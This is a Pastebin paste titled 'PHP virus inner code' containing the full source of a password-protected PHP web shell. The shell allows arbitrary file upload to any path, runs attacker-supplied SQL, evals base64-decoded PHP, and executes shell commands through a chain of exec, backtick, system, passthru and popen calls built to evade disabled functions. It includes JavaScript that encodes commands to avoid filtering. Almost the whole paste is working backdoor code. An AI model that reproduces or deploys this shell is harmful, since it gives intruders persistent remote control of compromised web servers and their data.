SHARE
TWEET

PHP virus inner code

a guest Mar 10th, 2012 368 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. error_reporting(E_ERROR | E_WARNING | E_PARSE);
  2. ini_set('display_errors', "0");
  3.  
  4. if ($_POST["p"] != "") {
  5.         $_COOKIE["p"] = $_POST["p"];
  6.         setcookie("p", $_POST["p"], time() + 3600);
  7. }
  8.  
  9. if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") {
  10.         echo "<form method=post>";
  11.         echo "<input type=text name=p value='' size=50>";
  12.         echo "<input type=submit name=B_SUBMIT value='Check'>";
  13.         echo "</form>";
  14.         exit;
  15. }
  16.  
  17. if ($_POST["action"] == "upload") {
  18.  
  19.     $l=$_FILES["filepath"]["tmp_name"];
  20.     $newpath=$_POST["newpath"];
  21.     if ($newpath!="") move_uploaded_file($l,$newpath);
  22.     echo "done";
  23.  
  24. } else if ($_POST["action"] == "sql") {
  25.  
  26.     $query = $_POST["query"];
  27.     $query = str_replace("\'","'",$query);
  28.     $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error());
  29.     mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());
  30.     mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());
  31.     mysql_close($lnk);
  32.     echo "done<br><pre>$query</pre>";
  33.  
  34. } else if ($_POST["action"] == "runphp") {
  35.  
  36.     eval(base64_decode($_POST["cmd"]));
  37.  
  38. } else {
  39.  
  40.     $disablefunc = @ini_get("disable_functions");
  41.     if (!empty($disablefunc)) {
  42.         $disablefunc = str_replace(" ","",$disablefunc);
  43.         $disablefunc = explode(",",$disablefunc);
  44.     } else $disablefunc = array();
  45.  
  46.     function myshellexec($cmd) {
  47.         global $disablefunc;
  48.         $result = "";
  49.         if (!empty($cmd)) {
  50.             if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);}
  51.             elseif (($result = `$cmd`) !== FALSE) {}
  52.             elseif (is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  53.             elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  54.             elseif (is_resource($fp = @popen($cmd,"r"))) {
  55.                 $result = "";
  56.                 while(!feof($fp)) {$result .= @fread($fp,1024);}
  57.                 @pclose($fp);
  58.             }
  59.         }
  60.         return $result;
  61.     }
  62.         $cmd = stripslashes($_POST["cmd"]);
  63.         $cmd_enc = stripslashes($_POST["cmd_enc"]);
  64.         if ($_POST["enc"]==1){
  65.                 $cmd=base64_decode($cmd_enc);
  66.         }
  67.         ?>
  68. <script language=javascript type="text/javascript">
  69. <!--
  70. var END_OF_INPUT = -1;
  71. var base64Chars = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/');
  72. var reverseBase64Chars = new Array();
  73. for (var i=0; i < base64Chars.length; i++){
  74.     reverseBase64Chars[base64Chars[i]] = i;
  75. }
  76. var base64Str;
  77. var base64Count;
  78. function setBase64Str(str){
  79.     base64Str = str;
  80.     base64Count = 0;
  81. }
  82. function readBase64(){    
  83.     if (!base64Str) return END_OF_INPUT;
  84.     if (base64Count >= base64Str.length) return END_OF_INPUT;
  85.     var c = base64Str.charCodeAt(base64Count) & 0xff;
  86.     base64Count++;
  87.     return c;
  88. }
  89. function encodeBase64(str){
  90.     setBase64Str(str);
  91.     var result = '';
  92.     var inBuffer = new Array(3);
  93.     var lineCount = 0;
  94.     var done = false;
  95.     while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){
  96.         inBuffer[1] = readBase64();
  97.         inBuffer[2] = readBase64();
  98.         result += (base64Chars[ inBuffer[0] >> 2 ]);
  99.         if (inBuffer[1] != END_OF_INPUT){
  100.             result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1] >> 4) ]);
  101.             if (inBuffer[2] != END_OF_INPUT){
  102.                 result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[2] >> 6) ]);
  103.                 result += (base64Chars [inBuffer[2] & 0x3F]);
  104.             } else {
  105.                 result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);
  106.                 result += ('=');
  107.                 done = true;
  108.             }
  109.         } else {
  110.             result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);
  111.             result += ('=');
  112.             result += ('=');
  113.             done = true;
  114.         }
  115.         lineCount += 4;
  116.         if (lineCount >= 76){
  117.             result += ('\n');
  118.             lineCount = 0;
  119.         }
  120.     }
  121.     return result;
  122. }
  123. function encodeIt(f){
  124.         l=encodeBase64(f.cmd.value);
  125.         f.cmd_enc.value=l;
  126.         f.cmd.value="";
  127.         f.enc.value=1;
  128.         f.submit();
  129. }
  130. //--></script>
  131.         <?
  132.    
  133.     echo "<form method=post action='' onSubmit='encodeIt(this);return false;'>";
  134.     echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\" size=150>";
  135.     echo "<input type=hidden name=enc value='0'>";
  136.     echo "<input type=hidden name=cmd_enc value=''>";
  137.     echo "<input type=submit name=B_SUBMIT value='Go'>";
  138.     echo "</form>";
  139.     if ($cmd != "") {
  140.         echo "<pre>";
  141.         $cmd=stripslashes($cmd);
  142.         echo "Executing $cmd \n";
  143.         echo myshellexec("$cmd");
  144.         echo "</pre>";
  145.         exit;
  146.     }
  147. }
RAW Paste Data
Top